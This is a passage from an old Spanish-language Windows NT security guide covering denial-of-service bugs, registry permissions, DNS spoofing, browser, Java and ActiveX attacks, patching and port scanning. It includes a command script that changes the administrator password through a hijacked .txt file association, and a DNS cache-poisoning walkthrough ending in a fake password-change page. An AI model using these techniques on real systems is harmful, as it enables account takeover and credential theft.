fragmentos IP manipulados maliciosamente, que al ser reensamblados en la maquina victima como un datagrama UDP invalido, provocan que esta pase a un estado inestable. En este estado, un sistema NT puede colgarse o reiniciarse. Generalmente aparece la pantalla BSOD. Este tipo de ataques es especialmente peligroso dado que existen multitud de implementaciones conocidas con el nombre de NewTear, Bonk y Boink que explotan esta debilidad. Ademas, a comienzos de Marzo del 98, salio a la luz un paquete que integraba todas ellas y las lanzaba de forma automatica contra un gran numero de hosts que el usuario podia especificar. La solucion para protegerse de este tipo de ataques en Windows 95 y NT es instalar el parche apropiado que Microsoft suministra. Este parche, al igual que mas informacion sobre esta vulnerabilidad, pueden encontrarse en el 'Microsoft Market Bulletin' titulado "New Teardrop-like TCP/IP Denial of Service Program" en la siguiente direccion: http://www.microsoft.com/security/newtear2.htm 7.3. Land Attack. Este ataque, desarrollado por "m3lt" <meltman@LAGGED.NET>, consiste en un nuevo bug en la implementacion de la pila TCP/IP de las plataformas Windows. El ataque consiste en mandar a algun puerto abierto de un servidor (generalmente al 113 o al 139), un paquete maliciosamente construido, con el bit SYN a 1, y con la direccion y puerto origen IGUAL que la direccion y puerto destino (ejm.: 10.0.0.1:139 a 10.0.0.1:139). Resultado: la maquina comenzara a mandarse mensajes a si misma y acabara por colgarse. El mensaje fue mandado a la lista BugTraq con el codigo fuente incluido (cosa normal en esta lista, por otro lado). 7.4. Ataque Smurf. Este ataque es bastante simple y a su vez devastador. Consiste en recolectar una serie de direcciones de broadcast para a continuacion mandar una peticion de echo ICMP a cada una de ellas en serie, varias veces, falsificando la direccion IP de origen. Este paquete maliciosamente manipulado, sera repetido en broadcast, y cientos o miles de hosts (segun la lista de direcciones de broadcast disponible) mandaran una respuesta de echo a la victima cuya direccion IP figura en el paquete ICMP. Los resultados son devastadores, pudiendo saturar facilmente un circuito T1. El programa se distribuye en fuente en r00tshell, junto con gran parte de los programas citados en este documento. 8. El vulnerable Registro de Windows NT. 8.1. šQue es el registro? El Registro es el corazon de Windows NT. Cada NT Workstation o NT Server tiene su propio Registro y cada uno contiene informacion sobre el hard y el soft instalado en el ordenador. Por ejemplo las caracteristicas de la tarjeta de Red Ethernet, las propiedades del escritorio, los perfiles de los usuarios, el fichero de passwords, cadenas que indican la fecha de caducidad en los programas shareware, propiedades y caracteristicas internas del sistema operativo... etc. Se sabe, por ejemplo, que en lo unico que se diferencias Windows NT WS y NT Server es unas diez claves del registro, pudiendo pasar de uno a otro modificando dichas claves, infringiendo por otro lado el acuerdo de compra con Microsoft al hacerlo. Tambien se guarda en el Registro todo lo que un usuario puedeo o no puede hacer. El Registro de NT se puede ver como una evolucion de los ficheros INI de Windows 3.1. hasta llegar a lo que es: una gran base de datos con abundante informacion delicada. Es interesante desde el punto de vista de la seguridad el hecho de que todo el control de acceso y parametros relacionados esten localizados en el Registro. Haremos una peque€a introduccion general al mismo, enfocando el tema a los aspectos de seguridad. El Registro contiene cientos de piezas de datos, agrupados en lo que se conoce como claves. Estas claves estan agrupadas en subarboles, donde se almacenan las claves similares de forma conjunta a la vez que copias de algunas de ellas en subarboles separados para un mejor acceso. El Registro se puede dividir en cuatro subarboles: HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE y HKEY_USERS. Los explicaremos en orden decreciente de importancia desde el punto de vista de la seguridad. El primer subarbol es el HKEY_LOCAL_MACHINE. Contien 5 claves diferentes: SAM y SECURITY - Estas claves contienen informacion como los derechos de usuarios, informacion de dominio para usuarios y grupos, y passwords. Este es un punto de ataque evidente para los hackers. Las claves estan almacenadas como datos binarios por razones de seguridad y generalmente no son accesibles a menos que seas el Administrador o formes parte del grupo de Administradores. HARDWARE - esta es la base de datos donde se guardan datos sobre los componentes hardware del ordenador. Los drivers y las aplicaciones construyen esta BD cuando arranca el ordenador y la actualizan en tiempo de ejecucion. Cuando se reinicia el ordenador, los datos se vuelven a construir desde cero. No es recomendable editar este trozo del Registro. SYSTEM - Esta clave contiene aspectos basicos como pueden ser que es lo que se carga al arrancar el sistema, que drivers han sido cargados, que servicios se estan usando, etc. Todos ellos se agrupan en subclaves ControlSet. Cuando el ordenador no puede arrancar correctamente, lee los ControlSet que necesite, almacenados en el Registro y arranca desde la "Ultima configuracion correcta". SOFTWARE - Esta clave guarda informacion sobre el software cargado localmente. Las asociaciones entre extensiones de ficheros y sus programas visores, informacion OLE y otras configuraciones variadas son lo que almacena esta clave. La segunda clave mas importante es HKEY_USERS. Contiene una subclave por cada usuario que accede al sistema, bien sea de forma local o remota. Si el servidor forma parte de un dominio y se conecta a traves de la red, su subclave no se guarda aqui sino en el Controlador de Dominio. Lo que si se guarda aqui son las propiedades del Escritorio y los perfiles de usuario. Las 2 claves restantes son HKEY_CURRENT_USER y HKEY_CLASSES_ROOT, que contienen copias de porciones de las claves HKEY_USERS y HKEY_LOCAL_MACHINE respectivamente. HKEY_CURRENT_USER contiene exactamente lo que su propio nombre indica: una copia de la subclave HKEY_USERS del usuario actualmente conectado. HKEY_CLASSES_ROOT contiene una parte de HKEY_LOCAL_MACHINE, concretamente informacion de la subclave SOFTWARE. Asociaciones de ficheros con sus programas, configuraciones OLE e informacion de dependencias. 8.2. šQue son los 'hives'? Los hives son otro tipo de subdivisiones del Registro. Contienen informacion relacionada. Esto no lo digo yo, lo dice Microsoft. Todos los hives estan almacenados en D:\WINNT\SYSTEM32\CONFIG. Los hives mas destacados y sus ficheros son: Hive Fichero Fichero Backup --------------------------- -------- -------------- HKEY_LOCAL_MACHINE\SOFTWARE SOFTWARE SOFTWARE.LOG HKEY_LOCAL_MACHINE\SECURITY SECURITY SECURITY.LOG HKEY_LOCAL_MACHINE\SYSTEM SYSTEM SYSTEM.LOG HKEY_LOCAL_MACHINE\SAM SAM SAM.LOG HKEY_CURRENT_USER USERxxx USERxxx.LOG ADMINxxx ADMINxxx.LOG HKEY_USERS\.DEFAULT DEFAULT DEFAULT.LOG La informacion de los passwords se encuentra en el fichero SAM. Como alternativa los hackers suelen buscar el fichero SAM.LOG. No suelen estar disponibles. 8.3. Los fallos del registro. Cualquier hacker puede hacerse due€o de un sistema NT con solo una subclave del registro mal configurada. Aunque se pretende tener todo bien organizado, la gestion del Registro de NT puede ser una tarea de titanes. Existen numerosos fallos de seguridad relacionados con el Registro y realizar una auditoria de ciertas claves del mismo nunca vendra mal. Mientras tanto, mantente alerta a alguno de los siguientes puntos relacionados con la seguridad y el Registro de Windows NT. 8.4. Acceso remoto al registro. Es posible que el sistema NT se haya instalado con permisos de escritura a Todos en demasiadas partes del Registro. Para averiguar que claves estan pobremente protegidas podemos usar la herramienta DumpAcl de Somarsoft. Aunque esto era un problema en NT 3.51 (la mala configuracion de los permisos) debido a la posibilidad de acceso remoto al registro que nos brinda la utilidad regedt32.exe, en especial si encima esta habilitada la cuenta de usuario invitado. NT 4.0 resolvio este problema introduciendo la siguiente clave del registro: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg Esta clave se presenta por defecto en NT 4.0 server, pero no en las NT 4.0 Workstations, por lo que habra que a€adirla. La presencia de esta clave deshabilita el acceso remoto al registro excepto a los administradores. Para ver lo que podria pasar si nos olvidamos de proteger correctamente el registro, valgan dos sencillos ejemplos. \ Un usuario remoto con perversas intenciones y un registro mal configurado nos podria llevar a ataques tipo D.o.S. periodicos por parte del intruso, dificiles de localizar por el administrador, provocando continuas reinstalaciones del sistema, como consecuencia de la imposibilidad por parte del administrador de encontrar el origen de los ataques. \ Crear troyanos y modificar apuntadores del registro a los programas originales para que apunten a los troyanos, los cuales podrian intentar crear cuentas de administrador (si es el administrador el que ejecuta el troyano , sin saberlo , este ataque seria posible). \ Bajo NT 3.51 se puede explotar la posibilidad de escribir en cierta clave del registro, concretamente en aquella que asocia extensiones de ficheros con sus respectivas aplicaciones. Es posible que pueda cambiarse ademas por un usuario remoto con acceso al registro via regedt32.exe. La entrada .txt de dicha clave podria cambiarse de la siguiente manera para que ejecute bogus.cmd: \\cierta_WS_de_NT_o_Unix\Disco_compartido_sin_clave\bogus.cmd donde bogus.cmd contiene: net user administrador xxxxx /y notepad %1 %2 %3 %4 %5 si el administrador cuando se conecte, pincha dos veces en un archivo con extension .txt, su password cambiara a xxxxx. Aunque este es un ejemplo un poco burdo dado que el administrador deberia darse cuenta de que aparece una pantalla de linea de comandos antes de abrirse el Notepad.exe. De todas formas es trivial realizar una aplicacion para Win32 de tal manera que los efectos sean mas destructivos. Asi que ojo con los permisos del Registro de NT. Los administradores deberian saber por otro lado, que modificar el Registro de forma incorrecta podria llevar a la imposibilidad de volver a arrancar el ordenador (recuerda, el Registro es el corazon de NT), por lo que recomiendo realizar un disco de recuperacion de emergencia con RDISK.EXE /antes de realizar ningun cambio al registro.Tambien podrias usar la herramienta ConfigSafe para "tomar fotos" del estado del Registro antes de realizar ningun cambio. Esta herramienta tambien es util cuando se quiere recuperar el estado del Registro anterior a la instalacion del algun programa que lo modifico. 9. Spoofing (un ataque comun a otros sistemas). 9.1. Introduccion. IP Spoofing & DNS Spoofing. [Traduccion, arreglos y explicaciones basadas en el capitulo 11.1.3. de The Modern Hacker Desktop Reference, del grupo Rhino9 [15 ], basado a su vez en un capitulo de "Windows NT Hacking FAQ" [25] ] Spoofing viene a traducirse como "hacerse pasar por otro". Es un ataque contra la autentificacion. Este tipo de ataques suele implicar un buen conocimiento del protocolo en el que se va a basar el ataque. Dos ataques tipo spoofing bastante conocidos son el IP Spoofing y el DNS Spoofing. El primero de ellos se hizo famoso al usarlo Kevin Mitnick en su ataque en Diciembre de 1995 a la red informatica de Tsutomu Shimomura, un especialista en seguridad que trabajaba en el Centro de Supercomputacion de San Diego. En principio parece que Windows NT no es sensible a este ataque en concreto, pero si lo es al ataque DNS Spoofing. 9.2. El ataque DNS Spoofing. Mediante la manipulacion de paquetes UDP, se puede comprometer la cache del servidor de nombres (DNS) de NT. Si se permite el metodo de recursion en la resolucion de "nombre < - - > direccion IP" en el DNS, es posible controlar algunos aspectos del DNS remoto. La recursion consiste en la capacidad de un servidor de nombres para resolver una peticion de direccion IP a partir de un nombre que no figura en su base de datos. Este es el metodo tipico de funcionamiento. Pero, pongamos un ejemplo para conocer como es posible lanzar este tipo de ataque: Supongamos que somos el root de ns.nmrc.org, IP 10.10.10.1. tambien tenemos el servidor pirate.nmrc.org con la direccion 10.10.10.2. y el servidor bait.nmrc.org con la direccion 10.10.10.3. Supongamos que lo que queremos conseguir es que los usuarios de lame.com accedan a nuestro servidor pirate.nmrc.org cuando intenten acceder a www.lamer.net. Bien, supondremos que tenemos una herramienta que implementa los siguientes pasos: - mandamos una peticion a ns.lame.com preguntando por la direccion de bait.nmrc.org. - ns.lame.com no encuentra la direccion en su base de datos y pregunta a ns.nmrc.org por bait.nmrc.org. - la peticion es ahora interceptada en ns.nmrc.org y extraemos el ID del paquete de peticion . - mandamos una peticion a ns.lame.com preguntando por la direccion de www.lamer.net. - dado que conocemos el numero de ID de la peticion anterior, hay muchas probabilidades de que el ID de la nueva peticion sea si no el siguiente, un numero muy cercano. - ahora es cuando viene realmente el ataque: construimos unos cuantos paquetes DNS de respuesta con diferentes numeros de identificacion ID. Estos paquetes de respuesta estan manipulados en el campo origen, haciendose pasar por ns.lamer.net y afirmando que la direccion que corresponde al ID de esa peticion es 10.10.10.2. ( en otras palabras, acabamos de mandar un paquete de respuesta a la pregunta "šcual es la direccion IP de www.lamer.net?" que ns.lame.com mando a otro DNS (seguramente ns.lamer.net), haciendonos pasar por este ultimo y afirmando que la respuesta es 10.10.10.2.) Si nuestros calculos de ID han sido correctos, la cache del DNS de ns.lame.com tendra ahora una entrada mas o menos asi: www.lamer.net --------> 10.10.10.2 lo que realmente corresponde a la direccion IP de pirate.nmrc.org. Lo que resta por hacer ahora es sencillo: copiar el aspecto de www.lamer.net (paginas html, graficos, applets Java, musiquilla de fondo,...) en pirate.nmrc.org para lo que nos podemos valer de excelentes programas de "copiado" web como Teleport Pro y poner un nuevo apuntador a una pagina que diga "Novedad!!!. Tenemos una nueva pagina de cambio de password gratuita, por si quieres cambiar el password de tu cuenta ftp de www.lamer.net.". Si no se quiere o no se puede traer una copia del servidor, se pueden traer solo las paginas que solicite el usuario, a medida que este vaya pinchando en los enlaces. Aunque se haya repetido cientos de veces para que esto no ocurra, aun hoy es muy posible que la cuenta de password en www.lamer.net que tenga el usuario victima, sea la misma que use para otras cosas.... Es posible usar este tipo de ataque para otros fines, como informar a la victima que www.lamer.net ha dejado de funcionar, redirigir su correo una vez analizado, etc... 10. Otros ataques via Web. Aunque no son especificos de Windows NT, los problemas de seguridad que implican los navegadores Web y sus tecnologias asociadas (ActiveX, JavaScript, ...) son un serio problema para cualquier administrador de sistemas NT. Por lo tanto, comentaremos aqui los aspectos mas importantes relacionados con la seguridad. 10.1. Ataques por JavaScript, VBScript JavaScript (Netscape) y VBScript (Microsoft) son dos lenguajes de script usados por los programadores Web para realizar sofisticadas paginas Web con un lenguaje menos "complicado"que Java. Los programas realizados con estos dos lenguajes son interpretados en el navegador. Como siempre, Internet Explorer y Netscape Navigator presentan incompatibilidades. Netscape no acepta VBScript y Explorer no acepta la ultima version de JavaScript. Las ultimas versiones de ambos lenguajes son potentisimas herramientas de programacion web y, por lo tanto, llevan asociados fallos de seguridad inherentes, aunque estos fallos son mucho mas numerosos en versiones antiguas de JavaScript, donde podemos encontrarnos con fallos como los siguientes: (extraido y modificado de "Penguin Cafe" www.geocities.com/SiliconValley/Peaks/6371/oculto.html ) # Cuando aparecio JavaScript, este permitia el envio de mensajes de correo electronico sin el reconocimiento del usuario, la lectura de la historia URL, la lectura de directorios y de ficheros. Lo que fue razon mas que suficiente para que cientos de intrusos informaticos se aprovecharan de estas debilidades. # El problema mas importante aparecio en Netscape 2.0 y fue conocido como "stuck on load". Lo que sucedia es que se podia crear una ventana de 1x1 pixeles, por la cual los intrusos podian seguir extrayendo informacion sin que el usuario se enterase y aun cuando este hubiese salido de la pagina, ya que esta ventana (era un simple punto) era imperceptible para el usuario. Evolucion cronologica de la correccion de errores: Problema a solucionar. Version en la que se soluciona. Lectura de directorios y ficheros 2.01 Lectura de historico URL 2.02 Correo electronico sin reconocimiento de usuario 2.01 "stuck on load" 3.0 Para mas informacion, consultar la direccion especializada en los fallos de seguridad en JavaScript de LoVerso[31] 10.2. Ataques por vulnerabilidades en los navegadores. Generalmente los navegadores no fallan por fallos intrinsecos, sino que fallan las tecnologias que implementan, aunque en este punto analizaremos realmente fallos intrinsecos de los navegadores, como pueden ser los "Buffer Overflow". Para una detallada informacion de este tipo de vulnerabilidades referirse a [34] pero indicaremos aqui a groso modo el fallo de seguridad mas importante y frecuente, especialmente en Internet Explorer debido a su alto grado de funcionalidad en los protocolos soportados mediante direccionamiento URL: Los "buffer overflows" consisten en explotar una debilidad relacionada con los buffers que la aplicacion usa para almacenar las entradas de usuario. Por ejemplo, cuando el usuario escribe una direccion en formato URL como puede ser http://www.cert.org esta se guarda en un buffer para luego procesarla. Si no se realizan las oportunas operaciones de comprobacion, un usuario con perversas intenciones, podria intentar mandar una direccion de este estilo: http://www.aaaaaaaaaaaaaaaa.com donde el numero de a's supera los 200 caracteres y en lugar de a's se pueden introducir combinaciones de letras, etc. Ademas, el protocolo usado ha sido http, osea el protocolo www, pero IE permite usar otro tipo de protocolos internos menos conocidos como res: o mk: . Precisamente existen dos fallos de seguridad del tipo "buffer overflow" en la implementacion de estos dos protocolos. El primero de ellos, el bug de res:// no afecta a NT, "solo" a Windows 95, sin embargo, es posible usarl el bug del mk: para ejecutar cualquier programa en Windows NT a partir de un link en una pagina Web! Concretamente, este fallo se materializa al manipular una direccion URL usando el protocolo mk:, protocolo usado por el "InfoViewer Topic" de Microsoft, por ejemplo en Visual Studio y el sistema de ayuda del IE4.0(1). Como prueba de la utilidad de mk: , podemos probar la URL del sistema de ayuda de Microsoft IE4.0: mk:@MSITStore:C:\WINDOWS\Help\iexplore.chm::/iexplore_welcome.htm Para poder lanzar este tipo de ataques hay que tener un buen conocimiento de ensamblador y de la estructura interna de la memoria en NT. Si se quiere profundizar mas en estos dos ataques podemos consultar la excelente base de datos de L0pht [17] o de Security BugWare [12] y si lo que se busca es entender a la perfeccion este tipo de ataques, es aconsejable leerse el TAO of Windows Buffer Overflow [34]. Tambien podemos citar en este documento el fallo de seguridad descubierto por Cybersnot Industries http://www.cybersnot.com/iebug.html, relativo a los ficheros .lnk y .url de Windows 95 y NT respectivamente. Las versiones de Microsoft Internet Explorer v3.01 y anteriores podian ser utilizadas para ejecutar la aplicacion que nosotros quisieramos siempre que existiera en el ordenador de la victima (trivial, pues algunas aplicaciones vienen por defecto, como el format.com). Bien, ahora una peque€a explicacion tecnica. Windows 95 guarda los accesos directos a aplicaciones como ficheros con extension .LNK; cuando pinchamos en algun fichero de este estilo, Win95 ejecuta el programa que dicho LNK describa. Los ficheros URL son algo parecido, excepto que el fichero URL tiene una semantica y una sintaxis ligeramente diferentes de los del LNK, y en que los URL se pasan al Internet Explorer para su ejecucion en lugar de ejecutarse por Windows95 directamente. Evidentemente se puede indicar que la aplicacion que queremos ejecutar sea file://format.com o cualquier otra aplicacion local. El problema surge cuando IE trata los LNK y los URL bajados de la red como si fueran locales; asi, es posible poner un link a un fichero LNK o URL en nuestras paginas web de tal manera que apunten a un programa que sabemos que existe en el ordenador de la victima que se conecte. Cuando lo haga y pinche sobre el, la aplicacion se ejecutara sin mas (como ya he dicho esto solo funciona en versiones del IE3.01 y anteriores y solo en aquellos que no hayan instalado los parches de Microsoft. Para mas informacion relacionada con los ataques intrinsecos a los navegadores, aparte de consultar los punteros indicados , se aconsejan las paginas no oficiales de seguridad tanto en Internet Explorer[29] como en Netscape Communicator[32]. 10.3. Ataques por Java. Java es un lenguaje de programacion interpretado desarrollado inicialmente por SUN. Su popularidad es tal que no merece mayor descripcion en este documento. Lo que si comentaremos por encima es su alto grado de seguridad. Los mas usados navegadores actuales, Netscape e IE, implementan Maquinas Virtuales Java (MVJ)para ser capaces de ejecutar applets Java descargados de Internet. Estos applets, al fin y al cabo no son mas que codigo ejecutable y como tal, susceptible de ser manipulado por intrusos con aviesas intenciones. Sin embargo, partiendo del dise€o, Java siempre ha pensado en la seguridad del sistema. Las restricciones a las que somete a los applets son de tal envergadura (imposibilidad de trabajar con ficheros a no ser que se especifique lo contrario por parte del usuario, imposibilidad de los applets de acceder a zonas de memoria directamente, firma digital,...) que es practicamente imposible lanzar ataques distintos de los ataques de tipo D.o.S. (Denial Of Service) contra plataformas JAVA. Sin embargo, existe un grupo de expertos liderados por dos profesores de la Universidad de Princeton, especializados en descubir fallas de seguridad en las implementaciones que de la MVJ hacen los distintos navegadores (Netscape, IE, HotJava (navegador de SUN)). Su direccion es accesible desde [41]. En un numero reciente de la revista Developer.com http://www.developer.com/news/stories/042498_hostile.html, el Dr. Mark D. LaDue, explicaba los ultimos fallos de seguridad encontrados (todos ellos relacionados con ataques tipo D.o.S.) en la implementacion de la MVJ en Netscape Communicator 4.04 y 4.05: Las potenciales amenazas iban desde un applet que volcaba continuamente bytes en el sistema de ficheros hasta bloquear la maquina al dejarla sin recursos de disco, hasta un applet que creaba subclases de la clase Applet ClassLoader, algo supuestamente prohibido por las especificaciones Java y que permite a los applets establecer conexiones con cualquier servidor y descargar applets maliciosos desde el para luego ejecutarlos. LaDue consiguio crear estos applets estudiando varios descompiladores de Java. Para probar las habilidades de los mismos, intento descompilar las 1669 ficheros de clases de Netscape Communicator 4.04. Al hacerlo, no pudo resistir la tentacion de estudiar el codigo resultante en busca de posibles agujeros de seguridad para construir applets hostiles. Todos estos applets hostiles y muchos mas, al igual que abundante y buena informacion sobre la seguridad en Java, se pueden encontrar en HAHP [30]. 10.4. Ataques por ActiveX. ActiveX es una de las tecnologias mas potentes que ha desarrollado Microsoft. Mediante ActiveX es posible reutilizar codigo, descargar codigo totalmente funcional de un sitio remoto... Esta tecnologia ha sido considerada la respuesta de Microsoft a Java (aunque ahora compita en el mercado con ambas). Una pagina Web con un control ActiveX puede ser ejecutada en principio solo en Internet Explorer, y digo en principio porque existe un Plug-In para Netscape que permite ejecutar controles ActiveX en los navegadores de dicha compa€ia. ActiveX soluciona los problemas de seguridad mediante certificados y firmas digitales. Una Autoridad Certificadora (AC) expende un certificado que acompa€ara a nuestros controles activos y a nuestra firma digital. Cuando un usuario descarga una pagina con ese control, se le preguntara si confia en la AC que expendio nuestro certificado y/o en nuestro control ActiveX. Si el usuario acepta el control, este puede pasar a ejecutarse sin ningun tipo de restricciones (solo las propias que tenga el usuario en el sistema NT). Es decir, la responsabilidad de la seguridad del sistema se deja en manos del usuario, tanto si este es un experto cibernauta consciente de los riesgos que puede acarrear la accion como si es el usuario es un perfecto novato en la materia. La pega de esta filosofia es que las Autoridades de Certificacion se fian de la palabra del programador del control activo. Es decir, el programador se compromete a firmar un documento que asegura que el control no es nocivo. Evidentemente siempre hay hackers expertos en programacion con pocos escrupulos o con ganas de experimentar, Un conocido grupo de hackers alemanes, Computer Chaos Club (CCC) [36], podria ser un ejemplo. CCC desarrollo un control ActiveX maligno que modificaba el programa de gestion bancaria personal Quicken95 de tal manera que si un usuario aceptaba el control (control que realizaba una tarea util aparte de crackear el Quicken, es decir, era un troyano) este realizaba la tarea que supuestamente tenia que hacer y ademas modifica el Quicken, para que la proxima vez que la victima se conectara a su banco, se iniciara automaticamente una transferencia de su cuenta a la cuenta de CCC. Como nota curiosa destacar que CCC cito a la television germana dias antes del ataque, para que lo filmara en directo. Otro control ActiveX especialmente pernicioso consistia en otro troyano, cuya mision oculta era especialmente malevola: manipular el codigo de Internet Explorer para que este nunca mas pidiera confirmacion al usuario a la hora de descargar un control activo de la Web. Es decir, dejaba totalmente descubierto a ataques con tecnologia ActiveX el sistema de la victima. 11. Medidas de seguridad Service Pack & HotFix. 11.1. Como parchear el sistema. Service Pack & Hot-Fix. Microsoft tiene una base de datos consultable via web, con parches y arreglos tanto para el sistema operativo Windows NT como para sus aplicaciones. En la jerga de Microsoft, un conjunto de parches o arreglos se denomina Service Pack (SP). El Service Pack actual para Windows NT 4.0. es el 3, pero Microsoft planea sacar el 4 para este verano (es de suponer que junto la liberacion de Windows 98). Tambien existen Service Packs (en adelante SP) para aplicaciones como el servidor IIS. Los SP son acumulativos. Esto significa que el SP3 contiene todo lo que tenia el SP2 ademas de los parches nuevos introducidos en el SP3. A menudo, los SP reemplazan gran cantidad de codigo, sobre todo las DLL's mas importantes del sistema o aplicacion.. Dado que la mayoria de las grandes aplicaciones (como los componentes 'backoffice' o los de 'developer studio') traen sus propias versiones de bibliotecas DLL "del sistema", los SP deben aplicarse cada vez que se realice una actualizacion de dicho sistema, donde estos terminos en cursiva no estan definidos claramente. A cualquier accion que reemplace cualquier componente actualizado por un SP o un hot-fix debe seguirle una nueva instalacion del ultimo SP y todos los hot-fixes. Recuerda ademas que, al a€adir hardware nuevo, a menudo se a€ade tambien nuevo software de control, lo que puede llevarnos a reinstalar el SP y/o hotfix adecuado. Los Hot-Fix, como ya habras adivinado, son parches intermedios desarrollados entre dos Service Pack, y estan considerados como "not fully regression tested", es decir, que Microsoft no ha comprobado todos los posibles efectos laterales, incompatibilidades, etc. Que pudieran producirse con su instalacion ypor lo tanto, la empresa de Redmond, no recomienda su instalacion a no ser que uno la crea totalmente necesaria. Mi consejo es que todo Hot-Fix que afecte a la seguridad del sistema NT, que es nuestra materia de estudio, deberia ser instalado automaticamente, sin dudarlo. De hecho, en NTSecurity [10], la principal lista de distribucion de seguridad en NT, se discutio durante un tiempo el que Microsoft advirtiera indiscriminadamente de que no se instalara un hot-fix a no ser que se estuviera totalmente seguro de lo que se hacia, pues esto echaba para atras a muchos administradores inexpertos, exponiendolos a ataques masivos. Microsoft reconocio su error y se comprometio a enmendarlo. Una nueva cuestion es la lengua local. Si estas ejecutando una version de NT que no sea de los EEUU, no podras aplicar todos los hot-fix disponibles. Algunos no dependen del lenguaje, mientras que otros se niegan a instalarse en una version extranjera (no de EEUU). Si te lo puedes permitir o te es posible, te aconsejo que trabajes con una version de NT de los EEUU al menos en alguno de tus servidores. Si lo haces de esta manera, podras instalar el hot-fix relacionado con un problema de seguridad inmediatamente, en cuanto salga, sin tener que esperar al siguiente SP (los Service Pack se lanzan en "todos" los idiomas, aunque tendras que esperar ademas a que se traduzca el correspondiente SP a tu idioma). Dentro de lo que cabe, los espa€oles tenemos suerte en este aspecto, pues normalmente salen casi al unisono los hot-fix en version estadounidense como en version castellana. Si no puedes o no quieres descargar el software de Internet, puedes contactar con tu representante Microsoft mas cercano y pedirle el ultimo Service Pack que necesites. Habitualmente tambien se distribuye en los CD's de las mejores revistas del sector informatico. Visita el Web de Microsoft o su servidor FTP en: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes Personalmente, recomiendo visitar el excelente site de Russ Cooper [9], donde literalmente, cada dos minutos, se actualizan las paginas Web relacionadas tanto con los hot-fix como con los Service Pack, y donde ademas podras encontrar abundante informacion sobre la causa que motivo la aparicion de tal parche. 12. Escaneadores de puertos TCP/UDP. Paranoic. 12.1. El arte del escaneo de puertos TCP. ( Traduccion libre y recorte del documento de Fyodor fyodor@dhp.com [20] publicado tambien en Phrack 49. En su pagina Web podras encontrar ademas el excelente escaneador de puertos para maquinas Unix/Linux "nmap") Este documento trata sobre muchas de las tecnicas usadas para determinar que puertos de cierta maquina estan escuchando para atender conexiones. Estos puertos representan canales de comunicacion potenciales. Mapear su existencia facilita el intercambio de informacion con el host, y por lo tanto es interesante y util para cualquiera que desee explorar su entorno de red, incluyendo a hackers. A pesar de lo que oigas de los medios de comunicacion, INTERNET no solo es el puerto 80. Cualquiera que confie exclusivamente en la WWW para recabar informacion se dejara el 90% de la misma en el tintero. 12.2. Introduccion. El escaneo, como metodo de descubrir canales de comunicacion susceptibles de ser explotados, lleva en uso mucho tiempo. La idea es escanear tantos puertos de escucha como sea posible, y guardar informacion de aquellos que sean receptivos o de utilidad para tus necesidades particulares. Muchas utilidades de auditoria se basan en este paradigma. El escaneo de puertos entro en el mundo de la seguridad informatica junto con los sistemas de telefonia. Dado que actualmente tenemos millones de numeros de telefono a los que podemos acceder con una simple llamada, pero de todos ellos, solo nos interesan el 0.5 %, quizas aquellos que respondan con una operadora (aquellos con los que nos conectemos via modem). La solucion logica para encontrar todos estos numeros que nos interesan es intentar conectarnos a todos. Asi pues, el-campo conocido como "wardialing" salio a la luz. Se desarrollaron excelentes programas como Toneloc desarrollados para escanear zonas geograficas enteras y mas. La idea basica es simple. Si llamas a un numero y tu modem te devuelve un mensaje de CONNECT, grabas el numero. En otro caso, el ordenador colgara el telefono y llamara incansablemente al siguiente numero. Aunque el "wardialing" aun es de utilidad, nos encontramos con que muchos de los ordenadores con los que deseamos conectarnos estan conectados a traves de redes como la Internet en vez de por redes telefonicas analogicas. Escanear este tipo de maquinas implica las mismas tecnicas de fuerza bruta. Mandamos una ristra de paquetes para varios protocolos y deducimos que servicios estan escuchando por las respuestas que recibimos o no recibimos. 12.3. Tecnicas. Con el tiempo, se han desarrollado un gran numero de tecnicas para reconocer los puertos abiertos de un sistema. Todas ellas ofrecen ventajas y desventajas. He aqui una peque€a descripcion de las mas comunes: ? TCP connect() scanning: esta es la forma basica del escaneo de puertos TCP. La llamada al sistema connect() que te ofrece tu sistema operativo es usado para abrir conexiones en cualquier puerto interesante de la maquina. Si el puerto esta escuchando, connect() devolvera una respuesta de exito, cualquier otro caso significara que el puerto no esta abierto o que no nos podemos conectar a el desde nuestra situacion. Una fuerte ventaja de esta tecnica es que no necesitas de privilegios especiales. Cualquier usuario en cualquier maquina UNIX puede usar esta llamada. Otra ventaja es la velocidad. Aunque realizar una llamada connect() de forma separada para cada puerto a investigar de forma lineal podria llevarnos mucho tiempo en una conexion lenta, puedes agilizar el escaneo usando muchos sockets en paralelo. Usando I/O de no bloqueo te permite inicializar un periodo de time-out peque€o y observar muchos puertos a la vez. La desventaja mas llamativa es que este metodo es facilmente detectable por el administrador del sistema a escanear y por lo tanto facil de filtrar. Los logs del sistema objetivo mostraran un gran numero de conexiones y mensajes de error para los servicios en los que se ha conseguido conectar la maquina que lanza el scanner e inmediatamente se ha desconectado. ? TCP SYN scanning: esta tecnica a menudo se refiere como un escaneo de "media-apertura", dado que nunca se abre una sesion TCP completa. Mandas un paquete SYN, como si fueras a usar una conexion real y esperar por la respuesta. Un SYN|ACK indica que el puerto esta abierto. Un RST es indicativo de que esta cerrado. Si se recibe un SYN|ACK, inmediatamente debemos mandar un RST para terminar la conexion. La principal ventaja de esta tecnica de escaneo es que pocos sitios estan preparados para registrarlos en sus logs. La desventaja es que en Unix, se necesitan privilegios de administrador para construir estos paquetes SYN. ? TCP FIN scanning: hay veces en que incluso el escaneo SYN no es lo suficientemente "clandestino" o limpio. Algunos firewalls y filtros de paquetes monitorizan la red en busca de paquetes SYN mandados a puertos restringidos y existen programas como synlogger y Courtney estan disponibles para detectar este tipo de scanners. Los paquetes FIN, por otro lado, podrian ser capaces de pasar sin advertirlos. Este tipo de escaneo fue explicado en detalle por Uriel Maimon en la e-zine Phrack 49, articulo 15. La idea es que los puertos cerrados tienden a responder a los paquetes FIN con el RST correspondiente. Los puertos abiertos, en cambio, suelen ignorar el paquete en cuestion. Como apunto Alan Cox, este es un comportamiento correcto del protocolo TCP . Sin embargo, algunos sistemas (entre los que se hallan los sistemas Microsoft) no cumplen con este requerimiento. Mandaran paquetes RST siempre, independientemente de si el puerto esta abierto o cerrado, y por lo tanto no son vulnerables a este tipo de escaneo. Sin embargo, es posible realizarlo en otros sistemas Unix. Actualmente, a veces surge la necesidad de determinar de forma remota si un servidor esta gobernado por Unix o NT, y esta puede ser una buena forma de hacerlo. Este tipo de escaneo, tambien se conoce por el nombre de 